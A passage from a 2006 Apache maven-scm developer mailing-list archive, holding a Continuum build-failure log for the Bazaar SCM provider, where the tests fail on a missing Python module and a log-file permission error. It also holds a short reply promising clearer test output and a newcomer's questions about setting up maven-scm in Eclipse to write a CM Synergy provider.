/home/nobody/continuum-maven/working-directory/66/target/test-classes > [INFO] [surefire:test] > [INFO] Setting reports dir: /home/nobody/continuum-maven/working-directory/66/target/surefire-reports > > ------------------------------------------------------- > T E S T S > ------------------------------------------------------- > [surefire] Running org.apache.maven.scm.provider.bazaar.command.checkin.BazaarCheckInCommandTes t > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 2, Failures: 0, Errors: 2, Time elapsed: 1.622 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.checkout.BazaarCheckOutCommandT est > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.641 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.status.BazaarStatusCommandTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.606 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.diff.BazaarDiffCommandTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.599 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.update.BazaarUpdateCommandTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.664 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogComman dTckTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.562 sec <<<<<<<< FAILURE !! > [INFO] --------------------------------------------------------------------- ------- > [ERROR] BUILD ERROR > [INFO] --------------------------------------------------------------------- ------- > [INFO] There are test failures. > [INFO] --------------------------------------------------------------------- ------- > [INFO] For more information, run Maven with the -e switch > [INFO] --------------------------------------------------------------------- ------- > [INFO] Total time: 9 seconds > [INFO] Finished at: Thu Mar 23 22:50:20 PST 2006 > [INFO] Final Memory: 8M/125M > [INFO] --------------------------------------------------------------------- ------- > > **************************************************************************** > > From [email protected] Fri Mar 24 07:49:57 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38912 invoked from network); 24 Mar 2006 07:49:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 07:49:57 -0000 Received: (qmail 81008 invoked by uid 500); 24 Mar 2006 07:49:57 -0000 Delivered-To: [email protected] Received: (qmail 80957 invoked by uid 500); 24 Mar 2006 07:49:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 80946 invoked by uid 99); 24 Mar 2006 07:49:56 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Mar 2006 23:49:56 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.slb.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Mar 2006 23:49:55 -0800 Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) id <[email protected]> for [email protected]; Fri, 24 Mar 2006 07:49:34 +0000 (GMT) Received: from gb0135clu01.mail.slb.com (gb0135clu01.mail.slb.com [161.129.204.104]) by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) with ESMTP id <[email protected]> for [email protected]; Fri, 24 Mar 2006 07:49:23 +0000 (GMT) Received: from pmxchannel-daemon.gb0135mbx01.mail.slb.com by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) id <[email protected]> for [email protected]; Fri, 24 Mar 2006 07:49:23 +0000 (GMT) Received: from TSMOERGRAVOFS ([161.129.204.104]) by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) with ESMTPSA id <[email protected]> for [email protected]; Fri, 24 Mar 2006 07:49:18 +0000 (GMT) Date: Fri, 24 Mar 2006 08:49:17 +0100 From: =?iso-8859-1?Q?Torbj=F8rn_Sm=F8rgrav?= <[email protected]> Subject: RE: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider In-reply-to: <[email protected]> To: [email protected] Message-id: <[email protected]> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 8BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I'll change the test output to be more spesific about where the error occured, if its the bazaar installation or if its due to unexpected response from bazaar. Torbjørn -----Original Message----- From: Brett Porter [mailto:[email protected]] Sent: 24. mars 2006 08:03 To: [email protected] Subject: Re: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider Any ideas on this? bzr 0.7 seems to be properly installed now. Can the output of the tests be improved? - Brett Continuum Build Server wrote: > Online report : http://ci.codehaus.org/continuum-maven/servlet/continuum/target/ProjectBuild .vm/view/ProjectBuild/id/66/buildId/714 > Build statistics: > State: Failed > Previous State: Failed > Started at: Thu, 23 Mar 2006 22:50:10 -0800 > Finished at: Thu, 23 Mar 2006 22:50:20 -0800 > Total time: 10s > Build Trigger: Forced > Exit code: 1 > Building machine hostname: cheddar.simulalabs.com > Operating system : Linux(unknown) > Java version : 1.5.0_03(Sun Microsystems Inc.) > > Changes > No files changed > > **************************************************************************** > Output: > **************************************************************************** > [INFO] Scanning for projects... > [INFO] --------------------------------------------------------------------- ------- > [INFO] Building Maven SCM Bazaar Provider > [INFO] task-segment: [clean, install] > [INFO] --------------------------------------------------------------------- ------- > [INFO] [clean:clean] > [INFO] Deleting directory /home/nobody/continuum-maven/working-directory/66/target > [INFO] Deleting directory /home/nobody/continuum-maven/working-directory/66/target/classes > [INFO] Deleting directory /home/nobody/continuum-maven/working-directory/66/target/test-classes > [INFO] [resources:resources] > [INFO] Using default encoding to copy filtered resources. > [INFO] [compiler:compile] > Compiling 19 source files to /home/nobody/continuum-maven/working-directory/66/target/classes > [INFO] [resources:testResources] > [INFO] Using default encoding to copy filtered resources. > [INFO] [compiler:testCompile] > Compiling 7 source files to /home/nobody/continuum-maven/working-directory/66/target/test-classes > [INFO] [surefire:test] > [INFO] Setting reports dir: /home/nobody/continuum-maven/working-directory/66/target/surefire-reports > > ------------------------------------------------------- > T E S T S > ------------------------------------------------------- > [surefire] Running org.apache.maven.scm.provider.bazaar.command.checkin.BazaarCheckInCommandTes t > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 2, Failures: 0, Errors: 2, Time elapsed: 1.622 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.checkout.BazaarCheckOutCommandT est > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.641 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.status.BazaarStatusCommandTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.606 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.diff.BazaarDiffCommandTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.599 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.update.BazaarUpdateCommandTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.664 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogComman dTckTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai n/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes t/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.562 sec <<<<<<<< FAILURE !! > [INFO] --------------------------------------------------------------------- ------- > [ERROR] BUILD ERROR > [INFO] --------------------------------------------------------------------- ------- > [INFO] There are test failures. > [INFO] --------------------------------------------------------------------- ------- > [INFO] For more information, run Maven with the -e switch > [INFO] --------------------------------------------------------------------- ------- > [INFO] Total time: 9 seconds > [INFO] Finished at: Thu Mar 23 22:50:20 PST 2006 > [INFO] Final Memory: 8M/125M > [INFO] --------------------------------------------------------------------- ------- > > **************************************************************************** > > From [email protected] Fri Mar 24 12:10:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74085 invoked from network); 24 Mar 2006 12:10:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 12:10:28 -0000 Received: (qmail 74094 invoked by uid 500); 24 Mar 2006 12:10:19 -0000 Delivered-To: [email protected] Received: (qmail 73918 invoked by uid 500); 24 Mar 2006 12:10:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 73852 invoked by uid 99); 24 Mar 2006 12:10:17 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 04:10:17 -0800 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=HTML_MESSAGE,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO smtp2.transport.bombardier.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 04:10:16 -0800 Received: from EMEAML02.UK.BOMBARDIER.TRANSPORT.COM (emea-ml02.atle.bombardier.com [161.129.204.104]) by smtp2.transport.bombardier.com (Switch-3.1.6/Switch-3.1.6) with ESMTP id k2OC59Cn021802 for <[email protected]>; Fri, 24 Mar 2006 13:09:43 +0100 (CET) In-Reply-To: <[email protected]> To: [email protected] Subject: Re: Implementing support for CM Synergy? MIME-Version: 1.0 X-Mailer: Lotus Notes Release 6.0 September 26, 2002 From: [email protected] Message-ID: <[email protected]> Date: Fri, 24 Mar 2006 13:10:01 +0100 X-MIMETrack: Serialize by Router on EMEA-ML02/Server/Transport/Bombardier(Release 6.0.3|September 18, 2003) at 03/24/2006 12:11:56, Serialize complete at 03/24/2006 12:11:56 Content-Type: multipart/alternative; boundary="=_alternative 00429E56C125713B_=" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multipart message in MIME format. --=_alternative 00429E56C125713B_= Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable Hi and thanks for the info! I'm new to both maven and maven-scm so bear with me... I have checked out maven-scm from svn. What would be the best solution to import this into Eclipse? Should I have each module (maven-scm-api, maven-scm-providers) as separate = Eclipse projects? Eclipse has a different directory standard. I'm sorry if these are simple questions, but the documentation of doing=20 this on the web site is quite thin. Regards Henrik "Torbjorn Smorgrav" <[email protected]> 2006-03-22 21:54 Please respond to [email protected] To [email protected] cc Subject Re: Implementing support for CM Synergy? Hi Henrik! > I posted this yesterday as well. But I haven't got any response yet. So > I'll ask again. > I want to implement support for CM Synergy. I'll be happy to help you. I recently added the Bazaar provider (yet to be released) so I can at least guide you through the same path that I took. > What baseline should I use? Use the current development baseline. http://maven.apache.org/scm/source-repository.html > What do I need to check out? Start with: maven-scm-api/ < http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-api/> maven-scm-test/ <http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-test/> And a reference provider eg. maven-scm-provider-bazaar/ < http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-providers/maven= -scm-provider-bazaar/ > Perhapes choose one that is most similar to the CM Synergy > What class or interfaced do I need to implement? What I did was change the implementation of an existing provider. That way I got fast results and I learned the API one step at the time. Basically what you need to implements is an (Abstract)ScmProvider and its commands. > How can I test my provider? 1. Run unit tests from your IDE The test classes in maven-scm-test was really helpfull to me. Try to include a tck test as soon as possible. See how the tck tests are implemented in the reference provider (its a no brainer :). It can be a bit tricky to setup your IDE to pickup your current modifications and not the installed version of the provider. Let me know it this becomes a problem. 2. Build and install the provider and test it with eg. "mvn scm:checkout" on a project where you have defined a scm url in the pom.xml. This was probably a too short answer. But if you post your questions as they come, I'll do my best to help you. And in the end I like to make a mave-scm howto webpage with all of this. Good luck, Torbj=F8rn [attachment "C.htm" deleted by Henrik Jonsson/SE/Transport/Bombardier]=20 =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=20 This e-mail communication (and any attachment/s) may contain confidential=20 or privileged information and is intended only for the individual(s) or=20 entity named above and to others who have been specifically authorized to=20 receive it. If you are not the intended recipient, please do not read,=20 copy, use or disclose the contents of this communication to others. Please = notify the sender that you have received this e-mail in error by reply=20 e-mail, and delete the e-mail subsequently.=20 Thank you.=20 =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=20 Ce message (ainsi que le(s) fichier/s), transmis par courriel, peut=20 contenir des renseignements confidentiels ou prot=E9g=E9s et est destin=E9 = =E0=20 l?usage exclusif du destinataire ci-dessus. Toute autre personne est par=20 les pr=E9sentes avis=E9e qu?il est strictement interdit de le diffuser, le = distribuer ou le reproduire. Si vous l?avez re=E7u par inadvertance,=20 veuillez nous en aviser et d=E9truire ce message.=20 Merci.=20 =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=20 --=_alternative 00429E56C125713B_= Content-Type: text/html; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable <br><font size=3D2 face=3D"sans-serif">Hi and thanks for the info!</font> <br> <br><font size=3D2 face=3D"sans-serif">I'm new 